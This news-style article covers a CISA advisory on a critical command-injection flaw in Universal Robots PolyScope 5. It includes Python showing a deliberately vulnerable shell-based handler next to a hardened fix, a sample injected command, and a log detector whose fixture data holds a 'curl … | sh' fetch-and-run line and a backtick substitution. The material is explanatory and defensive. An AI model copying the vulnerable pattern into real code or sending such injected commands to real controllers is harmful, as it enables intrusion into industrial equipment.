CISA published an industrial control systems advisory on May 14, 2026, warning that Universal Robots PolyScope 5 versions before 5.25.1 contain a critical command-injection flaw that lets an unauthenticated network attacker run commands of their choosing on a robot controller. Vera Mens of Claroty Team82 discovered and reported the vulnerability, which was coordinated through CISA and CERT/CC's VINCE platform. Universal Robots has deployed more than 100,000 cobots across thousands of companies in the United States, Mexico, Europe, and the Asia-Pacific, so the population of affected manufacturers is global.

Background

Universal Robots, a Danish company specializing in collaborative industrial robots (cobots), has patched a critical vulnerability in PolyScope 5, the operating system and graphical user interface that powers and controls the company's cobots. The Dashboard Server interface allows external systems to communicate with the robot controller over the network, enabling automation cells, supervisory systems, and custom integrations to issue commands. Customers may use this interface "to deliver information to a central management unit, to use legacy field protocols such as MODBUS and EtherNet/IP to manipulate other OT equipment, or to control the cobot remotely," according to Claroty's Mens.

The advisory follows similar warnings about Kuka, ABB, and Fanuc systems over the past two years, underscoring a broader pattern of security vulnerabilities surfacing in connected industrial robotics platforms as OT environments become increasingly networked.

Details

CVE-2026-8153 carries a CVSS 3.1 base score of 9.8 (Critical) and a CVSS 4.0 base score of 9.3. Universal Robots PolyScope 5 versions prior to 5.25.1 are affected. The Dashboard Server accepts user-controlled input and passes it to the underlying operating system without proper neutralization of special elements (OS command injection, CWE-78), so an unauthenticated attacker who can reach the Dashboard Server port can craft requests that cause commands of the attacker's choosing to run on the controller's operating system. This leads to remote code execution and full compromise of the controller, with high impact to confidentiality, integrity, and availability.
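The advisory describes the flaw only at the level of its weakness class, so the following is an added illustration of that class and its fix, written for this article in Python; it is not Universal Robots' code and not the actual vulnerable code path in PolyScope. The `load` verb, the `PROGRAM_DIR` path and the use of `ls -l` as a stand-in for whatever privileged operation the real server performs are all assumptions. The vulnerable handler splices a network-supplied program name into a shell command line; the hardened handler validates the name against a strict allowlist and then invokes the program as an argv list so no shell ever parses attacker-controlled text.

```python
import re
import subprocess

# Hypothetical layout for this example: robot programs live under PROGRAM_DIR.
PROGRAM_DIR = "/programs"

# Strict allowlist for a program name: alphanumerics, '_' and '-', ending in
# ".urp". No '/', extra '.', whitespace or shell metacharacters can pass.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_-]{0,63}\.urp")


def handle_load_vulnerable(program: str) -> str:
    """Vulnerable pattern (CWE-78): the caller-supplied name is interpolated into a
    shell command string, so ';', '|', '`' and '$(...)' are interpreted by /bin/sh."""
    shell_cmd = f"ls -l {PROGRAM_DIR}/{program}"
    result = subprocess.run(shell_cmd, shell=True, capture_output=True, text=True)
    return result.stdout + result.stderr


def validate_program_name(program: str) -> str:
    """Reject anything that is not a plain .urp file name (allowlist, not denylist)."""
    if not SAFE_NAME.fullmatch(program):
        raise ValueError(f"rejected program name: {program!r}")
    return program


def build_load_argv(program: str) -> list:
    """Hardened: validate first, then build an argv list; nothing is shell-parsed."""
    name = validate_program_name(program)
    return ["ls", "-l", f"{PROGRAM_DIR}/{name}"]


def handle_load_hardened(program: str) -> str:
    result = subprocess.run(build_load_argv(program), shell=False,
                            capture_output=True, text=True)
    return result.stdout + result.stderr


if __name__ == "__main__":
    # Constructed payload: a valid-looking name followed by an injected command.
    payload = "pick.urp; echo INJECTED"
    print("vulnerable handler output:", handle_load_vulnerable(payload).strip())
    try:
        handle_load_hardened(payload)
    except ValueError as exc:
        print("hardened handler:", exc)
```

The fix is not escaping: quoting the argument would still leave a shell in the loop and a future maintainer one refactor away from reintroducing the bug. Validating against a small positive grammar and passing an argv list removes the shell entirely, which is the property a reviewer should look for in the patched code path.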

Successful exploitation grants complete control over the robot controller, including the ability to alter safety configurations, steal sensitive production data, or manipulate physical robot movements. Security professionals warned that attackers could also use a compromised controller as a pivot point to reach other systems on the network.

Although OT networks are generally not publicly exposed, they are often flat and lack proper segmentation, meaning an initial foothold may not be difficult to obtain, Claroty's Mens told SecurityWeek. The vendor noted that remote exploitation requires the robot's Dashboard Server to be enabled in the UI and its port to be reachable by the attacker. No known public exploitation targeting this vulnerability had been reported to CISA at the time of publication.

A fix is available in the PolyScope 5.25.1 software update, and Universal Robots strongly recommends that all customers update to version 5.25.1 or newer as soon as possible. For sites unable to patch immediately, Universal Robots advised disabling the Dashboard Server if it is not required and restricting access to trusted hosts or subnets. A temporary workaround involves editing the polyscope.conf file to set ENABLE_REMOTE_EXECUTE=0 and restarting the service, though this disables the vulnerable endpoint entirely and may break automation workflows that rely on remote program start.

CISA advises asset owners to segment OT networks from IT and the internet using demilitarized zones (DMZs) and to implement network monitoring to detect exploits, noting that IDS signatures for CVE-2026-8153 are already available in Suricata and Snort rule sets.
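The mitigations above (restrict the Dashboard Server port to trusted hosts or subnets, and monitor the OT segment for exploitation attempts) can be checked with the same logic, so here is one added example in Python that does both over captured connection events; it is written for this article and is not CISA's, Claroty's or Universal Robots' tooling, and it is not one of the Suricata or Snort signatures the advisory mentions. The event line format is constructed for the example and is not a real PolyScope log format; the Dashboard Server's TCP port 29999 comes from Universal Robots' interface documentation rather than from the advisory. Each event from the port is flagged if its source address is outside the allowlisted OT subnets or if the command text carries shell metacharacters, which a legitimate automation cell never sends.

```python
import ipaddress
import re
from dataclasses import dataclass

# TCP port the Universal Robots Dashboard Server listens on (from UR documentation;
# not stated in the advisory). Restricting reachability of this port is the
# vendor's interim mitigation.
DASHBOARD_PORT = 29999

# Constructed sample events; the format is an assumption for this example.
SAMPLE_EVENTS = """\
2026-05-15T08:12:03Z src=10.20.30.5 dport=29999 cmd="load pick_place.urp"
2026-05-15T08:12:04Z src=10.20.30.5 dport=29999 cmd="play"
2026-05-15T08:40:17Z src=192.168.77.9 dport=29999 cmd="robotmode"
2026-05-15T08:41:02Z src=192.168.77.9 dport=29999 cmd="load x.urp; curl http://192.168.77.9/s | sh"
2026-05-15T09:01:55Z src=10.20.30.7 dport=29999 cmd="load `id`.urp"
2026-05-15T09:02:10Z src=10.20.30.7 dport=30002 cmd="set_digital_out(0, True)"
"""

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dport=(?P<dport>\d+) cmd="(?P<cmd>.*)"$'
)

# Characters that let a shell chain, redirect or substitute commands. A
# well-formed dashboard command (a verb plus an optional file name) never
# contains them, so their presence alone is worth an alert.
SHELL_META = re.compile(r"[;&|`$<>\\]")


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    cmd: str
    reasons: tuple


def analyze(events: str, trusted_nets) -> list:
    """Return one Finding per suspicious Dashboard Server event.

    trusted_nets: iterable of CIDR strings for subnets allowed to talk to the
    controller (the cell PLC / supervisory hosts), e.g. ["10.20.30.0/24"].
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for line in events.splitlines():
        m = EVENT_RE.match(line)
        if not m or int(m["dport"]) != DASHBOARD_PORT:
            continue  # not traffic to the vulnerable service
        src = ipaddress.ip_address(m["src"])
        cmd = m["cmd"]
        reasons = []
        if not any(src in net for net in nets):
            reasons.append("source outside trusted OT subnets")
        if SHELL_META.search(cmd):
            reasons.append("shell metacharacters in dashboard command")
        if reasons:
            findings.append(Finding(m["ts"], str(src), cmd, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS, ["10.20.30.0/24"]):
        print(f"{f.ts} {f.src} {f.cmd!r}: {'; '.join(f.reasons)}")
```

On the sample, the two events from the engineering VLAN host are flagged for the source address alone, before the injected `curl | sh` is considered, which is the point of the segmentation control: a correctly scoped allowlist catches the attacker's first connection even when the payload is something a metacharacter check would miss. The third finding, a metacharacter-laden command from a trusted host, is the case that justifies keeping content inspection as well, since a compromised supervisory host is precisely the pivot the advisory warns about.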

Outlook

Universal Robots has committed to a quarterly security update cadence starting in Q3 2026 and is expanding its bug bounty program via HackerOne. The advisory falls under CISA's expanded authority following the 2025 Critical Infrastructure Cybersecurity Act, which mandates reporting and prompt action for vulnerabilities in operational technology. For manufacturing operations running UR-series cobots in multi-vendor automation cells, security and operations teams face immediate pressure to reconcile patch timelines with production uptime constraints, particularly where change-management processes require pre-production validation before any software update is applied to a live robotic cell.